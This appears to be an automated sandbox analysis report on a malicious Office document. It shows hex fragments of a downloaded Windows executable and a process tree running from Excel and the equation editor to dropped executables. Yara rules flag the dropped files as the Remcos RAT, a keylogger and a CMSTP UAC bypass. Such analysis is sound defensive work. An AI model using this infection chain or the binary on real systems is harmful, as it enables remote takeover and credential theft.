                                                    2024-12-10 06:04:57 UTC7969INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}
                                                    2024-12-10 06:04:57 UTC8000INData Raw: b4 d5 8b 1d 36 b1 97 6c 02 10 01 99 21 56 c3 17 c1 44 30 d8 a8 22 15 d1 8c 09 14 dc 5c 54 44 f7 09 68 ca e0 ea 45 e8 2b c0 f1 88 81 e0 d8 a4 c8 42 c4 e7 63 3c b8 3b d0 23 7d ec 62 98 e5 e0 8c 17 08 4e 27 be 4f 6c 22 26 33 ef c3 c4 f1 8e 78 85 af 74 17 c0 78 20 3d 3b 26 dc c0 06 e7 b8 2c d2 63 29 12 6c 78 09 3c f4 c6 d4 d0 f0 b7 db 2e 9a 88 45 fa 04 fb 8d 85 d4 ff fe ff d8 ff a7 46 c1 ee 18 a3 e3 34 06 f9 95 27 62 b4 d2 6b 7d 23 30 60 ea 96 e2 5f 99 d6 68 64 b3 f0 fe 00 f2 52 90 47 ee ed 9c c2 3b c7 b0 38 6c fa 50 51 68 43 f7 bc 7f 75 09 f8 19 62 81 84 5a cb a0 57 ee 8c eb 5e a2 30 e4 13 91 f0 34 f9 d5 be 5c 93 fd 4f e1 60 fc f4 d9 1b d8 c3 1d 6b c8 8a b0 5a 3d b5 85 7e 1a 7c 2a f9 29 27 8f 80 7d fb 64 70 f7 f7 5d a4 12 2c 2a 42 08 29 d1 80 3d d1 00 75 0a
                                                    Data Ascii: 6l!VD0"\TDhE+Bc<;#}bN'Ol"&3xtx =;&,c)lx<.EF4'bk}#0`_hdRG;8lPQhCubZW^04\O`kZ=~|*)'}dp],*B)=u
                                                    2024-12-10 06:04:57 UTC8000INData Raw: 7b fe 02 74 09 22 e5 6a 02 5e eb e0 84 eb dc 18 34 c0 9f db 07 ee 0f eb da 38 01 74 ec c8 46 eb c5 db 5c 01 a6 27 57 fd 9a eb ca 46 7c 70 77 70 03 74 b1 1e af 11 c7 eb 9d 21 33 f6 80 5d e8 01 71 de 60 77 50 97 10 06 c1 18 29 b0 a7 9e 55 3e 19 39 03 ac 43 b8 9c a0 5d a9 84 04 5f 43 20 ef ac 13 dd 55 77 0b 3b 98 91 57 05 65 1d ab 76 40 55 9a 70 c6 78 0d 0a 0c 77 27 71 16 0a 00 42 55 cd 2a 1c 00 c1 80 4b 0e e3 a0 86 32 06 71 c7 a4 83 1e 2b 50 6e 17 22 3b 05 29 7f 6a 09 17 c2 a3 7e fc 81 fc 63 c3 70 06 76 a3 72 ce e0 27 80 0f 03 1c 55 ec 18 e0 17 38 03 8a 39 77 20 0f 87 52 86 ed d2 f8 1a 8e 8d 4f 18 35 9c c7 45 bd 03 60 04 ca 24 28 1a ab 81 f6 57 4e 4e bf 33 2d 94 c2 8e 05 f5 11 2b b0 d6 fd 0d c1 e0 04 03 1d dc ff fc b8 3c 3d 24 36 12 7b 61 1c 08 da c8 49 a8
                                                    Data Ascii: {t"j^48tF\'WF|pwpt!3]q`wP)U>9C]_C Uw;Wev@Upxw'qBU*K2q+Pn";)j~cpvr'U89w RO5E`$(WNN3-+<=$6{aI
                                                    2024-12-10 06:04:57 UTC8000INData Raw: db eb 15 e3 06 18 8d cf 06 18 0c 68 a2 7f 49 fe 41 00 e5 33 2f d2 0a e3 01 68 0b 30 76 8b eb 7c 26 90 df 6c 4b 0e f0 75 19 6e 30 22 db 3b d2 65 c0 02 26 72 0e bc 36 30 a4 e1 a0 61 64 f1 1e 48 64 1c b9 7c 06 39 1c 18 c7 fd 38 ac a4 19 a4 18 38 18 08 3c bb 7e bc 2d 00 46 88 06 18 18 57 dd d6 0d 88 08 0e 00 4d ce 4c 9d b0 ea 87 41 96 bd 9c 60 55 4e c6 53 b1 2e 2b ef 75 f2 96 90 d6 d7 64 26 4c e8 8b 6a a0 7a 35 08 04 f4 e7 78 0a 84 49 f6 13 e6 09 42 40 57 e1 a9 b0 b8 07 18 c4 7c c5 87 66 5d 20 f8 5c c2 7d 54 7b 67 a1 b5 31 53 65 92 41 53 78 59 74 54 94 04 92 9e fb f3 7a a1 32 16 a4 57 72 57 5b 72 68 01 65 98 ff 47 e0 30 74 17 02 80 04 34 85 78 cd 4c 83 05 87 c5 b0 03 2b 00 5c a8 0e af 12 be 0d ba f3 96 70 62 8d eb 07 89 32 2b b9 e1 bb 14 59 85 6b 61 cf 0f 87
                                                    Data Ascii: hIA3/h0v|&lKun0";e&r60adHd|988<~-FWMLA`UNS.+ud&Ljz5xIB@W|f] \}T{g1SeASxYtTz2WrW[rheG0t4xL+\pb2+Yka
                                                    2024-12-10 06:04:57 UTC8000INData Raw: b9 99 8c 3a 1f 28 26 70 cb 9f 8d 04 36 90 21 30 40 75 e0 3c 08 46 0c 73 10 0e 20 0b 7f 01 18 0c 4c c1 e1 02 51 65 d8 06 61 36 72 e4 06 2e 5a 28 4f 14 e9 76 ea 8b 4f c1 cc 30 98 a0 48 68 97 54 0e 0d 1b c1 02 4f 4f e4 0c f7 21 0f 8e 6f 62 23 a4 56 38 0f f2 1c 86 02 07 ff 75 0c cf 20 a5 5e b2 9a 14 ba 06 e0 fe 0b 8b aa 29 3b 39 75 e8 76 2e 90 4c 5b 06 79 60 bf 16 34 32 06 db ba 8d 17 5a 72 d3 80 c6 11 82 3f e7 d1 a3 8f 17 a3 48 c0 1f b5 c6 8b 1f 7a c0 c1 a5 cb 10 f6 0c 43 16 38 2f 30 5c d6 53 0b a4 36 d2 32 24 4a 14 09 ae 0b cd 1b 79 97 10 6c d1 2c d0 d8 0d 6f 19 ff c4 65 8d 48 ff 4a 75 1f 56 c5 55 b0 b0 b4 46 25 28 2f dc 74 73 86 45 37 8d 56 82 17 3b 35 9f 41 40 e5 7f 4b 85 f6 7e 47 c1 e6 04 03 35 3c c5 b8 d0 ab d4 38 0f 01 9f 8e 21 04 0f 35 7a b6 a1 1d 7f
                                                    Data Ascii: :(&p6!0@u<Fs LQea6r.Z(OvO0HhTOO!ob#V8u ^);9uv.L[y`42Zr?HzC8/0\S62$Jyl,oeHJuVUF%(/tsE7V;5A@K~G5<8!5z
                                                    2024-12-10 06:04:57 UTC8000INData Raw: 15 59 3b 23 b3 8c 31 2c 1c 26 18 19 2e 2f 97 97 28 6c 04 34 dc 02 7c 19 b9 8c 5c dd 88 d8 94 de a7 35 72 f4 ac 4f bc 50 3a 23 b3 39 51 74 0d 80 8c 01 f3 68 b0 96 c0 3d 94 21 2c 1f 9e 2a d2 28 00 01 2f ef e5 39 54 18 0c 1a 5c 14 18 17 a8 7b 11 18 79 2a 24 78 0c 1c f2 46 de c8 30 90 14 38 cc 2a 3c 91 e7 ca f3 19 d0 40 0c 48 96 48 18 79 5e 9e 98 4c 42 85 54 ec 79 5e de 39 0e 58 a6 5c 1b 1c 60 de c8 c8 1b 40 38 64 68 10 14 6c 70 d4 79 5e 18 bc 70 2a 9e 91 37 72 56 78 38 14 84 84 90 b3 2e f2 46 f0 a6 98 6d 9c 2b 60 69 10 19 79 bc a0 a4 b5 a8 1a 8a fc 18 08 92 b0 01 ff a1 54 18 f6 b6 65 1c 6a 2a 58 66 39 6c f1 11 84 02 cf 83 7c c6 14 19 f8 4d e1 b6 d2 6a 29 03 ee dc b3 20 8c 4a 91 23 6c 2a 79 90 49 c6 77 18 79 1e 74 76 89 98 02 2b 24 54 d1 f8 e8 26 e0 11 a8 6b
                                                    Data Ascii: Y;#1,&./(l4|\5rOP:#9Qth=!,*(/9T\{y*$xF08*<@HHy^LBTy^9X\`@8dhlpy^p*7rVx8.Fm+`iyTej*Xf9l|Mj) J#l*yIwytv+$T&k
                                                    2024-12-10 06:04:57 UTC8000INData Raw: 36 37 38 39 3a 3b 3c 3d 02 3e 3f 3e 40 41 4d ff ff de 42 43 09 47 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 66 50 4d 6d 16 98 51 66 40 7c 8b fe 9a 2e c2 4d 19 01 09 0b 4e 8f 6c 3c 9b 66 60 ac 74 5a 29 81 ff f6 83 3f ff 74 34 56 1c 39 17 7f 4e ff 76 24 7a 03 5c 69 bd 0a 20 0b 46 2c 82 52 ff 36 fe 63 e0 30 0b 9b 46 28 80 88 37 03 cf ed ab 20 62 83 66 2c 00 31 de 84 83 96 96 10 3b 50 04 3e 2c 73 42 38 34 8c 4e c0 81 d4 23 e5 34 80 c9 b8 58 1f 4c da c6 99 95 51 67 67 ba 02 52 f8 92 fa e1 f5 53 56 52 8f 53 98 0f 57 af 45 d8 91 bc ac 55 f3 43 e4 42 12 8f 05 c2 b3 01 d3 00 cc 12 d2 5d 2a 53 d2 10 a8 e6 fc 96 b7 40 0d 86 ef 80 4b 03 04 7b 04 84 24 1a 5c 10 89 7b a6 97 6f 37 f1 dc 02 44 30 0b 28 20 81 2a 3c 08 30 0e 6a 83 5d 5b b5 b3 b7 14 79 a2 3a 5c ca 72 86 ae db 18
                                                    Data Ascii: 6789:;<=>?>@AMBCGDEFGHIJKLMNOfPMmQf@|.MNl<f`tZ)?t4V9Nv$z\i F,R6c0F(7 bf,1;P>,sB84N#4XLQggRSVRSWEUCB]*S@K{$\{o7D0( *<0j][y:\r
                                                    2024-12-10 06:04:57 UTC8000INData Raw: cc 53 ab 58 d8 a1 77 8b 1d 0a 6e 81 4f ed a7 01 75 d6 04 2d 52 1a c0 8f 8d 84 d4 c6 b3 c1 1e bd dc 0f c4 75 a7 6a 3d 4e cc ef 41 77 f7 80 16 01 df 61 75 94 25 34 4b 79 48 8d a9 d1 eb a3 7e c8 07 6a 07 e8 d2 94 aa b0 05 db 55 8d 38 d3 f8 03 a4 de 67 ce ab 7a cc 8a 44 40 c1 15 2c d3 f6 d1 4e c9 ce 94 8e 45 19 12 f8 50 65 21 a5 9e 5d c8 94 78 04 74 65 e2 d9 19 92 8b 72 0d 6e 9b 11 ff 9b 77 e8 6a 6a 5e be 70 5a ca 06 6a 10 56 fc 12 70 f2 76 09 43 fe 6f 38 b0 62 35 90 7d fc 6a 21 59 66 2b c8 66 03 f9 7b 15 9c 6f ff 28 0f 87 84 0b 59 59 4f e9 f3 fb bd 3b f9 74 6b 4c 23 74 65 0a 25 74 5f 27 74 d4 81 e0 41 ec 2c 08 94 85 83 e0 9c 62 70 39 0c 2c 6d ac 5c 84 84 78 ff 3c e7 b4 ac d1 34 14 32 11 f8 5a 83 c2 d4 58 c0 2c 4c b0 98 f0 21 70 2f e4 85 70 24 0d 76 35 f7 bb
                                                    Data Ascii: SXwnOu-Ruj=NAwau%4KyH~jU8gzD@,NEPe!]xternwjj^pZjVpvCo8b5}j!Yf+f{o(YYO;tkL#te%t_'tA,bp9,m\x<42ZX,L!p/p$v5
                                                    2024-12-10 06:04:58 UTC8000INData Raw: d4 84 80 5d 88 c8 41 1e c3 8c 17 90 02 94 0a 9b cb 33 32 98 9c f0 a8 27 05 e4 90 43 2e ac b0 b4 cf c8 77 31 bd 85 bc c0 fc 0e b9 6c 2e cc 26 e8 d0 d4 39 e4 90 43 d8 dc e0 b9 fc b7 19 e4 02 0c 71 f0 00 08 37 3f f4 39 54 c7 0e f8 13 fc 53 0f 00 fc f7 66 07 0f 04 21 08 84 30 13 14 00 08 02 b7 0e 69 8b b4 c1 12 1c 20 cf c8 21 c7 85 24 28 2c 48 1c 72 79 2e 38 d8 3c 40 19 e4 21 87 44 48 02 4c 97 cd e5 19 50 60 5c 04 09 60 1e 72 c8 21 64 68 6c 01 5c 9e 91 41 70 74 78 80 0e 39 e4 f2 59 84 88 8c 33 32 c8 43 90 03 94 98 c8 83 8b cb 90 a4 a8 47 0b a8 21 87 1c 72 ac b0 b4 6d 2e cf c8 b8 bc a0 c8 09 19 21 87 1c f2 85 cc d0 d4 cb 33 72 c8 d8 dc e0 b8 21 87 5c 9e ec 7a f0 f4 5e 9e 1c e4 f8 02 fc 03 10 00 10 04 48 ef eb 7b d4 13 10 5e fb 13 0e f2 90 b6 c1 12 18 1c 01 20
                                                    Data Ascii: ]A32'C.w1l.&9Cq7?9TSf!0i !$(,Hry.8<@!DHLP`\`r!dhl\Aptx9Y32CG!rm.!3r!\z^H{^
                                                    2024-12-10 06:04:58 UTC8000INData Raw: cd 15 e7 1a 1d 1e 03 0b 50 36 19 cd 66 b3 7d 0c 6c 1e 10 73 14 b8 18 ef 0b cf f3 3c 9b d4 0f dc 21 57 3d 45 b3 d9 6c 36 13 8a 17 c0 0a a6 0e ae ed 79 9e 67 12 f3 29 0f 17 5c c6 16 c6 f3 3c 9b 92 09 78 90 c5 fa e8 52 c6 4f 51 66 8b 1e 66 22 e2 66 72 36 14 1a d1 f8 48 6e 2b 05 23 8d 6a 8a fe 77 d1 9b 32 12 36 f0 56 5f bf 4b e8 1e b0 42 50 09 4c 74 05 6a 18 58 5e c3 87 b0 7d 1a d6 c0 0c 6a 0c a8 c4 23 e1 df d0 60 78 fc 83 65 e4 9e 22 13 e8 3e 12 56 82 23 1c 84 88 99 40 41 04 ca 53 3a 33 7c 77 23 7e 8b c6 0c 79 41 08 2c 5b 1c f8 99 b0 30 09 53 e3 3c 83 a8 4f 43 b3 f4 a0 f4 34 04 5f 4c 67 18 c7 02 42 fc 56 08 0d 8d cc 82 00 b2 40 65 34 78 0c 70 76 50 4f a0 19 01 c2 5f 2c 47 04 59 3b f0 73 47 ff 91 f0 44 e8 10 02 c2 fc 18 65 17 08 7c c6 72 0d 50 53 3a 78 60 5f
                                                    Data Ascii: P6f}ls<!W=El6yg)\<xROQff"fr6Hn+#jw26V_KBPLtjX^}j#`xe">V#@AS:3|w#~yA,[0S<OC4_LgBV@e4xpvPO_,GY;sGDe|rPS:x`_


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:1
                                                    Start time:01:04:25
                                                    Start date:10/12/2024
                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                    Imagebase:0x13fd30000
                                                    File size:28'253'536 bytes
                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:2
                                                    Start time:01:04:52
                                                    Start date:10/12/2024
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                    Imagebase:0x400000
                                                    File size:543'304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:01:04:58
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\kudo.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\kudo.exe"
                                                    Imagebase:0x800000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 58%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:01:04:59
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\kudo.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 58%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:01:05:00
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:01:05:01
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:01:05:02
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:10
                                                    Start time:01:05:03
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:01:05:04
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:01:05:05
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:01:05:06
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
